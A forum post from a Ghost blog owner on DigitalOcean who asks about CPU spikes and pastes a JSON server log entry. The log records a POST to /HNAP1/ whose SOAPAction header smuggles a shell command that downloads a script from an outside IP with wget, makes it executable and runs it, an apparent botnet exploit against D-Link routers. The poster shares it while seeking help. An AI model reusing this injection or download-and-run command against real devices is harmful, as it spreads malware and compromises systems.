Hi,
I am running ghost on digital ocean with local mysql, newest version 5.30.
The blog is small, we don’t have peak of users.
During this week I saw several spikes 100% on cpu and the website becomes very slow or offline.
I found some strange log in the same time the spike starts:
{“name”:“Log”,“hostname”:“myhome”,“pid”:3807,“level”:30,“version”:“5.30.0”,“req”:{“meta”:{“requestId”:“e46ade01-7c79-4e09-883f-1e9b1f8b0283”,“userId”:null},“url”:“/HNAP1/”,“method”:“POST”,“originalUrl”:“/HNAP1/”,“params”:{},“headers”:{“x-forwarded-for”:“45.12.253.180”,“x-forwarded-proto”:“http”,“x-real-ip”:“45.12.253.180”,“host”:“137.184.48.98:80”,“connection”:“close”,“content-length”:“0”,“user-agent”:“Mozila/5.0”,“accept-encoding”:“gzip, deflate”,“accept”:“/”,“soapaction”:“"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://179.43.187.243/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"”},“query”:{}},“res”:{“_headers”:{“x-powered-by”:“Express”,“cache-control”:“public, max-age=31536000”,“location”:“https://137.184.48.98:80/HNAP1/",“vary”:"Accept, Accept-Encoding”,“content-type”:“text/plain; charset=utf-8”,“content-length”:“65”},“statusCode”:301,“responseTime”:“2ms”},“msg”:“”,“time”:“2023-01-14T23:54:45.769Z”,“v”:0}
It seems like an attack. But I really don’t understand too much.
I also use cloudflare.
Any ideas?
Thanks in advance